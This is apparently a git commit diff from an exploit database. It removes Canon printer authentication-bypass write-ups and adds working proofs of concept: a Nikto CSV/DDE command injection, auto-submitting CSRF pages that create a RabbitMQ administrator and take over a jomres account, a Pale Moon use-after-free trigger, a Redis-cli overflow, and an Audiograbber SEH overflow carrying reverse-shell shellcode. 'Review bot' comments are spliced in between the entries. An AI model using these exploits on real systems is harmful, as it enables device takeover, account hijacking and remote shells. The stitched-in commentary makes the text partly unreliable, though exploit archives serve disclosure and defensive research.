DB: 2018-06-19

16 changes to exploits/shellcodes

Nikto 2.1.6 - CSV Injection
Pale Moon Browser < 27.9.3 - Use After Free (PoC)
Audiograbber 1.83 - Local Buffer Overflow (SEH)
Redis-cli < 5.0 - Buffer Overflow (PoC)
Microsoft COM for Windows - Privilege Escalation
Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authentication Bypass
Canon MF210/MF220 - Authentication Bypass
Canon LBP7110Cw - Authentication Bypass
Canon LBP6030w - Authentication Bypass
Joomla! Component jomres 9.11.2 - Cross-Site Request Forgery
RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery
Redatam Web Server < 7 - Directory Traversal
This commit is contained in:
Offensive Security 2018-06-19 05:01:47 +00:00
parent 329d5722a0
commit 086cfb2c76
13 changed files with 390 additions and 588 deletions


@ -1,184 +0,0 @@
# Exploit Title: [ Incorrect Access Control in Canon LBP6650, LBP3370, LBP3460, LBP7750C]
# Date: [3.6.2018]
# Exploit Author: [Huy Kha]
# Vendor Homepage: [http://global.canon.com]
# Software Link: [ Website ]
# Severity: High
# Version: LBP6650, LBP3370, LBP3460, LBP7750C
# Tested on: Mozilla FireFox
# Description : An issue was discovered on Canon LBP6650, LBP3370, LBP3460, LBP7750C printers.
It is possible for a remote (unauthenticated) attacker to bypass the Administrator Mode authentication without a password at any URL of the device that requires authentication.
# PoC :
Start searching for Canon LBP6650 ,LBP3370, LBP3460 printers.
You can recognize them with the /tlogin.cgi parameter, but the version is
also been displayed on the webinterface.
https://imgur.com/a/QE3GfLw
# Example :
1. Go to the following url: http://127.0.0.1/tlogin.cgi
2. Click on Administrator Mode
3. Intercept now the request with Burpsuite and click on 'Ok'' to login.
And forward the request till you get the ''/frame.cgi?page=DevStatus''
parameter.
# Request :
GET /frame.cgi?page=DevStatus HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/tlogin.cgi
Cookie: CookieID=1610705327:; Login=11
Connection: close
Upgrade-Insecure-Requests: 1
# Response :
HTTP/1.1 200 OK
Date: MON, 05 JAN 1970 16:35:57 GMT
Server: CANON HTTP Server
Content-Type: text/html
Content-Length: 5652
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta http-equiv="pragma" content="no-cache"/>
<meta http-equiv="cache-control" content="no-cache,no-store,max-age=0"/>
<meta http-equiv="expires" content="Thu 01 Jan 1970 00:00:00 GMT"/>
<script language="JavaScript">
document.write('<title>Remote UI <');
switch("DevStatus")
{
case "DevStatus":document.write('Status');break;
case "DevError":document.write('Error Information');break;
case "DevUtil":document.write('Utility Menu');break;
case "DevCtrl":document.write('Device Control');break;
case "DevCalib":document.write('Calibration');break;
case "DevInfo":document.write('Device Information');break;
case "DevInfoSetDev":document.write('Change Device Information');break;
case "DevInfoSetSecu":document.write('Change Administrator Settings');break;
case "DevInfoSetIpSecu":document.write('Change IP Address Range');break;
case "DevInfoSetIpv6Secu":document.write('Change IP Address Range');break;
case "DevInfoSetMacSecu":document.write('Change Receiving Permitted MAC
Address');break;
case "DevInfoSetRuiSecu":document.write('Change Remote UI Setting');break;
case "KeyManageSet":document.write('Key and Certificate');break;
case "KeyManageDetail":document.write('Certificate Details');break;
case "KeyManageNewKey":document.write('Generate Key and Certificate');break;
case "KeyManageNewCert":document.write('#&Title_KeyManageNewCert');break;
case "KeyManageKeyInst":document.write('Install Key and Certificate');break;
case "KeyManageKeyPasswd":document.write('Enter Private Key
Password');break;
case "CaManageSet":document.write('CA Certificate');break;
case "CaManageDetail":document.write('Certificate Details');break;
case "CaManageKeyInst":document.write('Install CA Certificate');break;
case "JobHistory":document.write('Job Log Display');break;
case "DevFeature":document.write('Features');break;
case "DevNetwork":document.write('Network');break;
case "DevNetworkSetTcpip":document.write('Change TCP/IP Settings');break;
case "DevNetworkSetNetware":document.write('Change NetWare Settings');break;
case "DevNetworkSetApTalk":document.write('Change AppleTalk
Settings');break;
case "DevNetworkSetSMB":document.write('Change SMB Protocol
Settings');break;
case "DevNetworkSetNetIF":document.write('Change Ethernet Driver
Setting');break;
case "DevNetworkSetSNMP":document.write('Change SNMP Settings');break;
case "DevNetworkSetSNMPV3User":document.write('User Settings');break;
case "DevNetworkSetSNMPV3ConText":document.write('Context Settings');break;
case "DevNetworkSetSNMPV3ConTextSet":document.write('Context
Settings');break;
case "DevNetworkSetSpool":document.write('Change Spooler Setting');break;
case "DevNetworkSetNWakeUp":document.write('Change Startup Time');break;
case "DevNetworkParList":document.write('Parameter List');break;
case "DevNetworkFactDef":document.write('Initialize Network
Settings');break;
case "DevNetworkSetEmail":document.write('Change E-mail Print
Settings');break;
case "EmailRecv":document.write('Receive E-mails');break;
case "DevIDControl":document.write('Department ID Management');break;
case "DevIDSetting":document.write('Department ID Management');break;
case "DevIDRegist":document.write('Department ID Management');break;
case "DevIDEdit":document.write('Department ID Management');break;
case "DevCount":document.write('Counter Check');break;
case "JobPrtProp":document.write('Print Job Details');break;
case "JobPrtSecure":document.write('Unlock');break;
case "JobStore":document.write('Stored Job');break;
case "JobStoreList":document.write('#&Title_JobStoreList');break;
case "JobStoreEnterPwd":document.write('Enter Password');break;
case "JobStoreProp":document.write('Stored Job Details');break;
case "JobStoreExec":document.write('Print Stored Job');break;
case "JobStoreBoxProp":document.write('Change Box Settings');break;
case "JobLog":document.write('Print Log');break;
case "EmailLog":document.write('E-mail Receive Log');break;
case "PdfPrint":document.write('Direct Print');break;
case "PsPrint":document.write('Direct Print');break;
case "ImgPrint":document.write('Direct Print');break;
case "CfgCtrl":document.write('Control Menu');break;
case "CfgCtrlSet":document.write('Change Control');break;
case "CfgCtrlTimeSet":document.write('Change Date and Time');break;
case "CfgPaper":document.write('Paper Source Menu');break;
case "CfgPaperSet":document.write('Change Paper Source');break;
case "CfgLayout":document.write('Layout Menu');break;
case "CfgLayoutSet":document.write('Change Layout');break;
case "CfgQuality":document.write('Quality Menu');break;
case "CfgQualitySet":document.write('Change Quality');break;
case "CfgUserMainte":document.write('User Maintenance Menu');break;
case "CfgUserMainteSet":document.write('Change User Maintenance');break;
case "CfgExpCard":document.write('Extension Card');break;
case "SupLink":document.write('Support Links');break;
case "SupLinkSet":document.write('Edit Support Links');break;
case "Debug":document.write('Debug');break;
case "Syslog":document.write('System Log');break;
default:document.write('');break;
}
document.write('> : LBP6650 ; LBP6650</title>');
var url = new String(document.location);
var ssl = "0";
if( ssl == '1')
{
if(url.match("https") == null )
{
document.location.href = "blank.html";
}
}
</script>
</head>
<frameset cols="185,*" frameborder="NO" border="0" framespacing="0" >
<frame src="/menu.cgi?Type=DEVICE" marginwidth="8" marginheight="0"
name="Index" noresize scrolling="NO">
<frame src="/dstatus.cgi" name="Body">
</frameset>
<noframes>
<body>
</body>
</noframes>
</html>
# Do we have now access to the printer with Admin Mode? : Yes
# How to fix this? : Remove the default password and add a new (strong) password.
# Screenshot : https://imgur.com/a/ISDL1Qf (Administrator Mode)


@ -1,323 +0,0 @@
# Exploit Title: [ Incorrect Access Control in Canon MF210 & MF220 Series ]
# Date: [4.6.2018]
# Exploit Author: [Huy Kha]
# Vendor Homepage: [http://global.canon.com]
# Software Link: [ Website ]
# Version: MF210 & MF20 Series
# Severity: High
# Tested on: Mozilla FireFox
# Description : An issue was discovered on Canon MF210 & MF220 printers webinterface.
It is possible for a remote (unauthenticated) attacker to bypass the System Manager Mode authentication without a PIN at any URL of the device that requires authentication.
# PoC :
Start searching for Canon MF210 & MF220 printers.
You can recognize them with the /login.html parameter, but the version is
also been displayed on the webinterface.
https://imgur.com/a/5ON4HF6
# Example :
1. Go to the following url: http://127.0.0.1/login.html
2. Click on System Manager Mode
3. Intercept now the request with Burpsuite and click then on 'Ok'' to login. And forward the request till you get the ''/portal_top.html'' parameter.
# Request :
GET /portal_top.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://129.2.52.116/login.html
Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC
Connection: close
Upgrade-Insecure-Requests: 1
# Response :
HTTP/1.1 200 OK
Expires: Thu, 1 Jan 1998 00:00:00 GMT
Content-Type: text/html
Content-Length: 6119
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0
Connection: close
Set-Cookie:
fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="content-script-type" content="text/javascript" />
<meta http-equiv="content-style-type" content="text/css" />
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="cache-control" content="no-cache,no-store,max-age=0" />
<meta http-equiv="expires" content="Thu, 01 Jan 1970 00:00:00 GMT" />
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<link rel="shortcut icon" type="image/x-icon" href="media/favicon.ico" />
<link rel="stylesheet" type="text/css" media="all" href="css/ja.css" />
<link rel="stylesheet" type="text/css" media="all" href="css/common.css" />
<link rel="stylesheet" type="text/css" media="all" href="css/portal.css" />
<link rel="stylesheet" type="text/css" media="all" href="css/icons.css" />
<script type="text/javascript" src="js/rui.js"></script>
<script language="javascript">
function unloadFunc(e) { }
registEvent(window, "unload", unloadFunc);
</script>
<title>Remote UI: Portal: MF220&nbsp;Series: MF220 Series</title>
</head>
<body>
<div id="container">
<div id="ruiPotalSet">
<div class="Wrapper">
<div id="portalBranding">
<h1 id="deviceLogo">
<a href="portal_top.html">
<img src="media/branding_logo_imageCLASS.png" />
</a>
</h1>
<div id="productInformation">
<table>
<caption></caption>
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColumn" />
</colgroup>
<tbody>
<tr>
<th>Device Name:</th>
<td>MF220&nbsp;Series </td>
</tr>
<tr>
<th>Product Name:</th>
<td>MF220 Series </td>
</tr>
<tr>
<th>Location:</th>
<td> </td>
</tr>
</tbody>
</table>
</div>
</div>
<div id="commonTools">
<fieldset id="authTools">
<p><a href="/logout.cgi"><span class="Name">Log Out</span></a></p>
</fieldset>
</div>
</div>
<hr />
</div>
<div id="applications">
<div id="portalApplicationBranding">
<div class="Wrapper">
<h1 id="applicationLogo"><img src="media/app_icon.png" /><span
class="BrandingName">Remote UI: Portal</span></h1>
<div id="appTools">
<a href="mailto:"><span class="Name">Mail to System Manager</span></a>
</div>
</div>
</div>
<hr />
<div id="applicationContents">
<div class="Wrapper">
<div id="contentsWrapper">
<div id="contents">
<div id="contentHeading_potal">
<h2 class="PageName">Device Info</h2>
<div id="contentHeadingTools">
<div id="tmpUpdate">Last Updated:06/04/2018 04:27 AM</div>
<div id="tmpReload">
<a href="javascript:location.reload()"><img src="media/bh_updt.gif"
alt="Update" title="Update" /></a>
</div>
</div>
</div>
<hr />
<h2>Contents</h2>
<div id="quotationModule">
<div class="QuotationModuleHeading"><h3></h3></div>
<div class="QuotationModuleElement">
<div id="deviceBasicInformation" class="ContentModule">
<div class="ModuleHeading"><h4>Device Basic Information</h4></div>
<div id="deviceStatusModule" class="ModuleElement">
<h5>Device Status</h5>
<table class="PropertyListComponent">
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColum" />
</colgroup>
<tbody>
<tr>
<th>Printer:</th>
<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>
<span class="StatusMessage">Sleep mode.</span>
</td>
</tr>
<tr>
<th>Scanner:</th>
<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>
<span class="StatusMessage">Sleep mode.</span>
</td>
</tr>
<tr>
<th>Fax:</th>
<td><span class="StatusIcon"><img src="media/sg_ok.gif"/></span>
<span class="StatusMessage">Ready to send or receive faxes.</span>
</td>
</tr>
</tbody>
</table>
</div>
<div id="deviceErrorInfoModule" class="ModuleElement">
<h5>Error Information</h5>
<p>No errors.</p>
</div>
</div>
<div id="MaintenanceInfomationModule" class="ContentModule">
<div class="ModuleHeading"><h4>Consumables Information</h4></div>
<div id="paperInfomationModule" class="ModuleElement">
<input type="button" class="ButtonEnable" value="Check Consumables Details"
onclick="location.href='consumables_check.html'"/>
<h5>Paper Information</h5>
<table summary="Paper Source, Remaining Paper, Paper Size">
<colgroup>
<col class="PaperSourceColumn" />
<col class="RemainColumn" />
<col class="PaperSizeColumn" />
<col class="PaperTypeColumn" />
</colgroup>
<thead>
<tr>
<th>Paper Source</th>
<th>Paper Level</th>
<th>Paper Size</th>
<th>Paper Type</th>
</tr>
</thead>
<tbody>
<tr>
<th>Multi-Purpose Tray</th>
<td>None</td>
<td>LTR</td>
<td>Plain (16 lb Bond-23 lb Bond)</td>
</tr>
<tr>
<th>Drawer 1</th>
<td>OK</td>
<td>LTR</td>
<td>Plain (16 lb Bond-23 lb Bond)</td>
</tr>
</tbody>
</table>
</div>
<div id="tonerInfomationModule" class="ModuleElement">
<h5>Cartridge Information</h5>
<table>
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColumn" />
</colgroup>
<thead>
<tr>
<th>Color</th>
<th>Level</th>
</tr>
</thead>
<tbody>
<tr>
<th>Black</th>
<td><img src="media/ink_bk06.gif" alt="" title="" />60%</td>
</tr>
</tbody>
</table>
</div>
</div>
<div id="linkInformationModule" class="ContentModule">
<div class="ModuleHeading"><h4>Support Link</h4></div>
<div class="ModuleElement">
<table class="PropertyListComponent">
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColumn" />
</colgroup>
<tbody>
<tr>
<th>Support Link:</th>
<td></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
<hr />
<div id="navigationWrapper">
<div id="navigation">
<h2>menu</h2>
<div id="navStandard">
<h3 class="GroupTitle">Standard Tool</h3>
<ul>
<li class="Main">
<a href="j_plist.html" class="Standby SystemMain"><span class="Name">Status
Monitor/Cancel</span></a>
</li>
<li class="Main">
<a href="p_paper.html" class="Standby UsermodeMain"><span
class="Name">Settings/Registration</span></a>
</li>
</ul>
</div>
<div id="navGeneral">
<ul>
<li class="Main">
<a href="a_addresslistone.html" class="Standby AddressMain">
<span class="Name">Address Book</span></a>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<hr />
<div id="applicationInfo">
<address class="SiteInforLegal">Copyright CANON INC. 2014</address>
</div>
</div>
</div>
</body>
</html>
# Do we have now access to the printer with System Manager Mode? : Yes
# Screenshot : https://imgur.com/a/U6oBYNV
# How to fix this? : Remove the default password and add a new (strong) password.


@ -1,39 +0,0 @@
# Exploit Title: Canon LBP7110Cw - Authentication Bypass
# Date: 2018-06-07
# Exploit Author: Huy Kha
# Vendor Homepage: http://global.canon.com
# Version: LBP7110Cw
# CVE: CVE-2018-12049
# Severity: High (Leads to full System Manager Mode account take-over)
# Description : A remote attacker can bypass the Management Mode on the
# Canon LBP7110Cw web interface without a PIN for /checkLogin.cgi via
# vectors involving /portal_top.html to get full access to the device.
# PoC :
# As you can see when we're type a random password.
# You'll get an error for an incorrect authentication.
# Now with a simple request, we can bypass the authentication
# and get full access to the printer with ''Management Mode''
1. Go to the following url: http://TargetURL/
2. Click on Management Mode
3. Intercept now the request with Burpsuite and click then on 'Ok'' to
login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request
to the GET /portal_top.html HTTP/1.1
# Request :
GET /portal_top.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://164.125.112.38/
Cookie: sessid=QegLH5ETb92HEEPWr55AiA##
Connection: close
Upgrade-Insecure-Requests: 1
# Do we have now access to the printer with Management Mode? : Yes
# Impact: A remote attacker can have take-over the whole printer


@ -1,38 +0,0 @@
# Exploit Title: Canon LBP6030w - Authentication Bypass
# Date: 2018-06-07
# Exploit Author: Huy Kha
# Vendor Homepage: http://global.canon.com
# Version: LBP6030w
# Severity: High (Leads to full System Manager Mode account take-over)
# CVE: CVE-2018-12049
# Description : A remote attacker can bypass the System Manager Mode on the
# Canon LBP6030w web interface without a PIN for /checkLogin.cgi via vectors
# involving /portal_top.html to get full access to the device.
# PoC :
# Now with a simple request, we can bypass the authentication and get full
# access to the printer with ''System Manager Mode''
1. Go to the following url: http://TargetURL/
2. Click on System Manager Mode
3. Intercept now the request with Burpsuite and click then on 'Ok'' to
login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request to
the GET /portal_top.html HTTP/1.1
# Request :
GET /portal_top.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://23.125.171.217/
Cookie: sessid=TOIJNROiOcNQQaGdHeQ3PQ##
Connection: close
Upgrade-Insecure-Requests: 1
# Do we have now access to the printer with System Manager? : Yes
# Impact: A remote attacker can have take-over the whole printer if there
# is no PIN set by a user.


@ -0,0 +1,52 @@
# Exploit Title: Nikto 2.1.6 - CSV Injection
# Google Dork: N/A
# Date: 2018-06-01
# Exploit Author: Adam Greenhill
# Vendor Homepage: https://cirt.net/Nikto2
# Software Link: https://github.com/sullo/nikto
# Affected Version: 2.1.6, 2.1.5
# Category: Applications
# Tested on: Kali Linux 4.14 x64
# CVE : CVE-2018-11652
# Technical Description:
# CSV Injection vulnerability in Nikto 2.1.6 and earlier allows remote attackers
# to inject arbitrary OS commands via the Server field in an HTTP response header,
# which is directly injected into a CSV report.
# PoC
# Install nginx and nginx-extras: apt-get install -y nginx nginx-extras
# Configure the nginx server as follows by editing the /etc/nginx/nginx.conf file:
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
# multi_accept on;
}
http {
server_tokens off; # removed pound sign
more_set_headers "Server: =cmd|' /C calc'!'A1'";
server {
listen 80;
server_name localhost;
location /hello {
return 200 "hello world";
}
}
}
# Restart the server: service nginx restart
# Scan the nginx server with Nikto configured to output the results to a CSV file:
nikto -h <nginx address>:80 -o vuln.csv
# Open the resulting CSV file in Microsoft Excel and observe that CMD is attempting
# to execute
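Review bot: The description at the top says the Server header lets a remote attacker "inject arbitrary OS commands", but the visible PoC (`more_set_headers "Server: =cmd|' /C calc'!'A1'"`) only executes if the user opens the CSV in a spreadsheet with DDE enabled and clicks through its security prompts, so the impact line should carry that caveat. The remediation is missing: Nikto should neutralize any response-derived field that begins with `=`, `+`, `-`, `@`, tab or CR before writing it to CSV (prefix with a single quote and wrap the cell in double quotes), and this applies to every field copied from the target, not only Server. The `# removed pound sign` remark on the `server_tokens off;` line is a note-to-self and should be dropped from the config listing. `Affected Version: 2.1.6, 2.1.5` and `2.1.6 and earlier` disagree on scope; state the affected range once.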

21
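--- a/exploits/linux/local/44904.py
+++ b/exploits/linux/local/44904.py
@@ -0,0 +1,21 @@
+# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)
+# Date: 2018-06-13
+# Exploit Author: Fakhri Zulkifli
+# Vendor Homepage: https://redis.io/
+# Software Link: https://redis.io/download
+# Version: 5.0, 4.0, 3.2
+# Fixed on: 5.0, 4.0, 3.2
+# CVE : CVE-2018-12326
+# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker
+# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.
+$ ./src/redis-cli -h `python -c 'print "A" * 300'`
+Could not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known
+#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566
+#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637
+#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5
+#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9
+#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
+#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)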
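Review bot: The `# Version: 5.0, 4.0, 3.2` and `# Fixed on: 5.0, 4.0, 3.2` headers list the same releases as both affected and fixed, contradicting the `< 5.0` in the title; the header should name the first fixed release of each branch rather than repeating the affected list. The claim that a local attacker can "escalate to higher privileges" is not supported by what is shown: the ASAN frames place the overflow in snprintf called from repl() (redis-cli.c:1624) inside the attacker's own redis-cli process, which only crosses a privilege boundary if a more privileged caller runs redis-cli on untrusted arguments (a sudo rule or a wrapper script), and that precondition should be stated explicitly. The file is stored as a .py but holds a shell transcript and a stack trace, which a Python interpreter rejects at the `$ ./src/redis-cli` line; either prefix those lines with `#` or store the PoC as .txt.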


@ -0,0 +1,24 @@
# Exploit Title: RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery
# Date: 2018-06-17
# Author: Dolev Farhi
# Vendor or Software Link: www.rabbitmq.com
# Version: 3.7.6
# Tested on: Ubuntu
<html>
<h2>Add RabbitMQ Admin</h2>
<body>
<form name="rabbit" id="rabbit" action="http://Target/api/users/rootadmin" method="POST">
<input type="hidden" name="username" value="rootadmin" />
<input type="hidden" name="password" value="rootadmin" />
<input type="hidden" name="tags" value="administrator" />
<input type="submit" value="save" />
</form>
<script>
window.onload = rabbit.submit()
</script>
</body>
</html>
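Review bot: `window.onload = rabbit.submit()` calls submit() immediately while the document is still parsing and assigns its undefined return value to onload; it only works because the form element precedes the script, and should read `window.onload = function () { document.forms.rabbit.submit(); };`. The `# Version: 3.7.6` header names the release the title says is fixed; write it as `# Version: < 3.7.6 (fixed in 3.7.6)` so readers do not test the patched build. The form sends a URL-encoded POST to `/api/users/rootadmin`, whereas the management HTTP API is documented to create users with a PUT carrying a JSON body, so the entry should state against which version this exact request created the administrator and which session or auth material the victim's browser supplied, since that is the substance of the CSRF claim.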


@ -0,0 +1,37 @@
# Exploit Title: Joomla!Component jomres 9.11.2 - Cross site request forgery
# Date: 2018-06-15
# Exploit Author: L0RD
# Vendor Homepage: https://www.jomres.net/
# Software link: https://extensions.joomla.org/extension/jomres/
# Software Download: https://github.com/WoollyinWalesIT/jomres/releases/download/9.11.2/jomres.zip
# Version: 9.11.2
# Tested on: Kali linux
===================================================
# POC :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://127.0.0.1/jomres/index.php?cmd=account/index" method="POST">
<input type="hidden" name="password" value="decode" />
<input type="hidden" name="password&#95;verify" value="decode" />
<input type="hidden" name="email" value="borna&#46;nematzadeh123&#64;gmail&#46;com" />
<input type="hidden" name="first&#95;name" value="decode" />
<input type="hidden" name="last&#95;name" value="test" />
<input type="hidden" name="company" value="test" />
<input type="hidden" name="vat&#95;no" value="100000000" />
<input type="hidden" name="address1" value="test1" />
<input type="hidden" name="address2" value="test2" />
<input type="hidden" name="city" value="New&#32;York" />
<input type="hidden" name="county" value="test" />
<input type="hidden" name="postalcode" value="100001" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
===================================================
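Review bot: The form posts password, password_verify and email to `index.php?cmd=account/index` without any session token, which, if the request succeeds as described, means the jomres account page does not validate a per-session anti-CSRF token; the entry should say so and name the fix (a session-bound token checked on every state-changing account request, e.g. Joomla's `JSession::checkToken()`). The effect is a full account takeover rather than a profile edit, since both the password and the recovery e-mail are replaced, and the description should state that impact and that the victim must be logged in. The value of the `email` input looks like a real personal address; use a placeholder such as `attacker@example.com`. No fixed version is given; add one or state that none was available at publication.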


@ -0,0 +1,37 @@
# Exploit Title: Pale Moon Browser < 27.9.3 - Use After Free (PoC)
# Date: 2018-06-13
# Author - Berk Cem Goksel
# Vendor Homepage: https://www.palemoon.org/
# Software Link: https://www.palemoon.org/palemoon-win32.shtml
# Version: Versions prior to 27.9.3 (Tested versions: 27.9.0, 27.9.1, 27.9.2)
# Tested on: Windows 10
# Category: Windows Remote Exploit
# CVE : CVE-2018-12292
<html>
<head>
<style>
</style>
<script>
function SetVariable(fuzzervars, var_name, var_type) {
fuzzervars[var_type] = var_name;
}
function jsfuzzer() {
var var_1 = var_2.getDistributedNodes();
SetVariable(var_1, 'NodeList');
}
</script>
</head>
<body onload=jsfuzzer()>
<!-- beginhtml -->
<content id="var_2" loopend="1" default="" max="0" charset="ISO-2022-JP"></content>
<!-- endhtml -->
</body>
</html>
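Review bot: `SetVariable(var_1, 'NodeList')` passes two arguments to a function declared with three, so `var_type` is undefined and the call merely sets `var_1[undefined] = 'NodeList'`; it is fuzzer scaffolding unrelated to the crash and should be removed or annotated, e.g. `// trigger: getDistributedNodes() on the <content> element below; SetVariable is fuzzer residue`. The PoC also relies on `var_2` resolving through the window's named-element property rather than `document.getElementById('var_2')`, which deserves a comment because that lookup is browser-dependent. The header calls this a "Windows Remote Exploit" while the title marks it a PoC and nothing here shows controlled reuse of the freed object; a line stating what was actually observed (crash versus an exploitable primitive) would set expectations correctly.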

110
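--- a/exploits/windows/local/44903.py
+++ b/exploits/windows/local/44903.py
@@ -0,0 +1,110 @@
+# Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH)
+# Date: 2018-06-16
+# Exploit Author: Dennis 'dhn' Herrmann
+# Vendor Homepage: https://www.audiograbber.org/
+# Version: 1.83
+# Tested on: Windows 7 SP1 (x86)
+#!/usr/bin/env python
+# $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $
+#
+# Tested with Windows 7 SP1 (x86)
+# Steps:
+# - Paste "poc.txt" content in the "Interpret" or "Album" field
+class Exploit:
+def __init__(self, shellcode):
+self._shellcode = shellcode
+self._payload = None
+def __write(self):
+f = open("poc.txt", "w")
+f.write(self._payload)
+f.close()
+def run(self):
+pattern = "A" * 256
+jmp_short = "\xeb\x08\x90\x90" # short JMP
+pop2ret = "\x79\x91\x01\x10" # WMA8Connect.dll
+self._payload = pattern
+self._payload += jmp_short
+self._payload += pop2ret
+# The buffer is mangled so we have to jump
+# over the parts to reached our shellcode
+self._payload += "\x90" * 18 + jmp_short
+self._payload += "\x90" * 28 + jmp_short
+self._payload += "\x90" * 32 + self._shellcode
+self.__write()
+def main():
+# msfvenom --platform windows -p windows/shell_reverse_tcp \
+# LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d" \
+# -e x86/alpha_mixed -f py
+shellcode = (
+"\xda\xcd\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51"
+"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
+"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
+"\x38\x41\x42\x75\x4a\x49\x39\x6c\x59\x78\x6f\x72\x77"
+"\x70\x73\x30\x73\x30\x43\x50\x4e\x69\x6b\x55\x55\x61"
+"\x69\x50\x32\x44\x6c\x4b\x76\x30\x70\x30\x6e\x6b\x50"
+"\x52\x54\x4c\x4c\x4b\x72\x72\x47\x64\x6c\x4b\x74\x32"
+"\x46\x48\x36\x6f\x6d\x67\x73\x7a\x67\x56\x74\x71\x6b"
+"\x4f\x4e\x4c\x37\x4c\x51\x71\x53\x4c\x53\x32\x34\x6c"
+"\x75\x70\x59\x51\x78\x4f\x56\x6d\x73\x31\x79\x57\x6b"
+"\x52\x4b\x42\x71\x42\x56\x37\x4c\x4b\x63\x62\x74\x50"
+"\x6e\x6b\x52\x6a\x57\x4c\x4c\x4b\x42\x6c\x54\x51\x32"
+"\x58\x4d\x33\x37\x38\x57\x71\x58\x51\x76\x31\x4e\x6b"
+"\x33\x69\x31\x30\x37\x71\x4e\x33\x6e\x6b\x61\x59\x47"
+"\x68\x4a\x43\x47\x4a\x43\x79\x4e\x6b\x76\x54\x6e\x6b"
+"\x37\x71\x38\x56\x74\x71\x59\x6f\x4c\x6c\x4b\x71\x78"
+"\x4f\x36\x6d\x36\x61\x68\x47\x75\x68\x6b\x50\x70\x75"
+"\x39\x66\x55\x53\x31\x6d\x4c\x38\x35\x6b\x73\x4d\x71"
+"\x34\x62\x55\x4a\x44\x73\x68\x4c\x4b\x31\x48\x61\x34"
+"\x76\x61\x58\x53\x30\x66\x6e\x6b\x76\x6c\x50\x4b\x4e"
+"\x6b\x31\x48\x35\x4c\x67\x71\x59\x43\x4c\x4b\x37\x74"
+"\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x33\x74\x55\x74\x45"
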